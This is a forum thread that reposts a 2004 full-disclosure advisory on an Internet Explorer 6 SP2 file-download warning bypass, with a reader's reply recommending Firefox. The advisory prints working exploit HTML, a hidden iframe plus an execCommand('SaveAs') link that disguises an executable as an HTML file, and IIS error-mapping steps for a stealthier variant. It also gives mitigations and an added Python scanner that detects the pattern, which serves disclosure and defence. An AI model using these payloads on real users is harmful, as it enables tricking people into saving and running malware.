Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit


JM Tella Llop [MVP Windows]

Internet Explorer 6.0 SP2 File Download Security Warning Bypass Exploit
http://www.k-otik.com/exploits/20041119.IESP2Unpatched.php

Microsoft Internet Explorer (including IE for Windows XP SP2) is
reported vulnerable to a file download security warning
bypass. This unpatched flaw may be exploited to download a malicious
executable file masquerading as an HTML file.

Secunia did not release the technical details (aka Security by
Obscurity) thus we publish this page (aka Full Disclosure)

Solution

[EN] Disable Active Scripting and the "Hide file extensions for known
file types" option [Tools->Folder Options->View]
[FR] Disable Active Scripting and the "Hide extensions for known
file types" option [Control Panel -> Folder Options -> View]


Credits : go to cyber flash


How does it work ? A.K.A Exploit

The following code requires no special server setup, and should work
from any webpage that IE 6.0 fetches:

<html>
<body>
<iframe src='http://domain.com/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
</body>
</html>

Also, here's an example that requires modifying the IIS Error Mapping
Properties (see below):
<html>
<body>
<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>Click
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>.
</body>
</html>

Steps to configure IIS:

Launch Internet Information Services manager.
Under the 'Custom Errors' tab, modify the Error Mapping Properties as
follows:

1. Error Code: 404
2. Default Text: Not Found
3. Message Type: URL
4. URL: /v.exe (name of the executable)

Within the HTML page, insert an IFRAME as follows:

<iframe src='vengy404.htm' name="NotFound" width="0" height="0"></iframe>

The file 'vengy404.htm' intentionally doesn't exist on the server, so
it will trigger a 404 error message as defined above. But, the
javascript code below references the stealthy v.exe data within the
frame 'NotFound' and is linked to 'funny joke.exe' when prompted to
save the file:

javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');


» The original advisory (mirrored by K-OTik) is available here

--
Jose Manuel Tella Llop
MVP - Windows
(e-mail address removed) (remove XXX)
http://www.multingles.net/jmt.htm

This message is provided "as is" without warranties of any
kind, and confers no rights.

This posting is provided "AS IS" with no warranties, and confers no
rights.
You assume all risk for your use.
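
A defender-side check for the markup pattern described in the post above, added here as an example and not part of the original post or advisory: it flags an iframe whose URL path is an executable while the query string ends in .htm, and event handlers that call execCommand('SaveAs', ...) with an executable file name. The function names, the extension lists and the example.test host are assumptions of this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extension lists and all names below are assumptions of this example.
EXEC_EXT = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd")
HTML_EXT = (".htm", ".html")
# execCommand('SaveAs', <flag>, '<suggested file name>') inside an event handler
SAVEAS = re.compile(r"execCommand\(\s*['\"]SaveAs['\"]\s*,[^,]*,\s*['\"]([^'\"]+)['\"]", re.I)

class Scanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            url = urlsplit(a.get("src", ""))
            # Path names an executable, but the query string ends like an HTML page.
            if url.path.lower().endswith(EXEC_EXT) and url.query.lower().endswith(HTML_EXT):
                self.findings.append(("exe-path-html-query", a["src"]))
            if a.get("width") == "0" or a.get("height") == "0":
                self.findings.append(("hidden-iframe", a.get("name", "")))
        for name, value in a.items():
            if name.startswith("on"):
                for m in SAVEAS.finditer(value):
                    if m.group(1).lower().endswith(EXEC_EXT):
                        self.findings.append(("saveas-executable", m.group(1)))

def scan(html):
    s = Scanner()
    s.feed(html)
    s.close()
    return s.findings

def is_suspicious(findings):
    # A hidden iframe alone is common on benign pages, so it is context only.
    return any(kind != "hidden-iframe" for kind, _ in findings)

# Constructed samples modelled on the two snippets in the post.
DIRECT = """<iframe src='http://example.test/v.exe?.htm' name="NotFound" width="0" height="0"></iframe>
<a href=# onclick="javascript:document.frames.NotFound.document.execCommand('SaveAs',1,'funny joke.exe');">here</a>"""
VIA_404 = DIRECT.replace("http://example.test/v.exe?.htm", "vengy404.htm")
BENIGN = """<iframe src="/ads/banner.html" width="0" height="0"></iframe><a href="/report.pdf" onclick="track('dl')">report</a>"""

if __name__ == "__main__":
    for label, page in (("direct", DIRECT), ("via 404", VIA_404), ("benign", BENIGN)):
        print(label, is_suspicious(scan(page)), scan(page))
```

The 404-mapping variant is caught only by the SaveAs rule, because its iframe URL looks like an ordinary .htm page; the mismatch there is visible only in the response the server actually returns.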
 

Guest

Download, install and set Mozilla Firefox as your default browser.
http://www.mozilla.org/ However, you must use IE6 for Windows and Office
Updates.
 
